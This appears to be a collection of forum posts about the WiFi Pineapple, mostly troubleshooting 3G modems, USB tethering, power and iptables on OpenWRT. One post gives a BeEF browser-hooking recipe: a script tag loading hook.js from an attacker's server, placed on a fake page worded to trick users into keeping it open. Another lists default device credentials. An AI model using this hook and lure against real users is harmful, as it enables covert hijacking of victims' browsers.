  1. Right so that rules out mains power, please post the results of 'ps' 'free' and 'df -h'
  2. I've run BeEF on a minimal VPS before, and it was a bit slow, I guess it could work on the Pineapple but it would take up resources, see what you can do!
  3. This methold could also be used the BeEF, placing the hook.js script directly onto a fake webpage on the pineapple and the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking. Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background. inject this: <script language='Javascript' src="192.168.1.100/hook.js"></script> where 192.168.1.100 is the IP address (local or remote) of the beEF server
  4. Without sounding like a fanboy the simple fact is android creates the best enviroment for intercompatability with openwrt/linux etc, if you want to get you blackberry to work I suggest you search for openwrt and blackberry teathering and trying to install packages and such to get it working. As supply and demand will probarly not result in blackberry teathering been included in stock pineapple firmware. Before you mess around with getting these packages to work and changing configurating files I would suggest that you get comfortable with the re-flashing of the pineapple just incase!
  5. As a novice to 3g it would seem your connection is been made but dropped straight away, firstly I would ask if you are definitely in a coverage area for your network provider, and secondly double check the settings as foxtrot has mentioned.
  6. Not necessary but recommended, just a safety net to prevent damage to your pineapple. I'd also recommend using a cheap extension cable and cut that, so if you reuse your hub you don't have to resolder it.
  7. Try it on mains power and see if the rebooting still occurs, at least this way we can rule out the power issues that were suggested.
  8. Cheers Seb, Am I correct in saying the pineapple automatically detects usb0 and sets up iptable rules according?
  9. sark, Ensure you are connecting to 172.16.42.1:1471/pineapple (user:root pass:pineapplesareyummy) Also, as you are using a usb ethernet adaptor, I would use the usb passthrough option to pass the whole adaptor through to the virtual machine, most likely it will be supported under linux. Using the usb passthrough as the connection to the pineapple it would be a good idea to create a second 'bridged' adaptor which avoid triple NAT'ing which would reduce network speeds.
  10. Thanks for the heads up, if my research is correct then usb modeswitch is used mainly to switch a usb 3G stick with a sd card from a 'external hard drive' to a '3G modem'?
  11. No problem, glad you could get it working! Just Remember to back up your 3G connection script externallly (computer, dropbox etc) now, and you can restore it in the future when you firmware upgrade etc!
  12. This is not supported by the jasager team. I would recommend getting a short usb extension cable and cutting the power cable, (red I think - although do your research before you continue) leave the other cables intact, this will prevent 'backpower' flowing to your pineapple.
  13. Post a copy of your fstab, dmesg/logs so potential helpers can get a better insight into your problem :)
  14. Looked at the Github repository for a script but think it may be beyond the webui! edit: Don't have my pineapple with me at the moment so will have a look on it when I get hold of it again, unless anyone else knows how it does it?
  15. Why: Because I'm lazy and Don't want to write it myself! I noticed when the pineapple has a usb0 device (android phone) it automatically adjusts its iptables rules to use this at the gateway to the internet. Wondered if i could have this script so i can use it on a personal project. Background for those who are interested: I have a internet connection with Virgin Media, which constantly drops out. I also have unlimited teathering on my Galaxy S3 with ThreeUK, so want to be able to plug it into my WR1043N and have it automatically foward all traffic over the usb0 connection. I want to also edit the script so when usb0 is removed the WAN ethernet port is once again used as the internet access gateway. Many Thanks, IntheDMZ
  16. Are you running the Dev version firmware 2.7.7? I think Seb means you must be running this firmware to have the latest kernel, although having said that it seems you are using to correct kernel according to your uname -a
  17. I wouldn't have thought the power would be a problem, i have used a setup very similar to yours (not the same modem) except i had a small unpowered hub and a usb stick plugged in too. Try having a look at this forum thread and see if it helps: https://forum.openwrt.org/viewtopic.php?id=30002 Edit: also worth backing up your current 3G settings before starting the change product/vender IDs
  18. My Knowledge of 3G is very small, although I will ask If the Modem is carrier locked at all?
  19. Thought I'd do the 'post my gear' bit. left to right top row and down. 1. Novatech Nfinity ultrabook running dual boot Ubuntu and backtrack 2. TP-link WR703N running OpenWRT with a unlocked 3G modem 3. Raspberry PI running Debian with kismet server installed 4. TP-link WR841N running OpenWRT with kismet Drone (to pipe to PI) 5. Linksys WRT54GS running OpenWRT with kismet drone (to pipe to PI) 6. Pc engines Wrap 2.c running OpenWRT aircrack-ng installed Bottom right of the Pic, i'm sure you will all reconise the Wifi Pineapples and Alfa USB adaptor, along with the anker battery to power the pineapples. Bottom left, couple of usb sticks and a yubikey. http://imgur.com/ig436xi
  20. I can also confirm that this little cable was a issue for me too
  21. You most likely need to check the serial settings, not sure what they were for the fonera, but google around and see what you can find!
  22. "Do I need to be offline when I run these commands or it doesn't matter? Did the commands change?" AFAIK the commands should work offline as they are applied as iptable rules, which will change the routing once the traffic starts to flow.
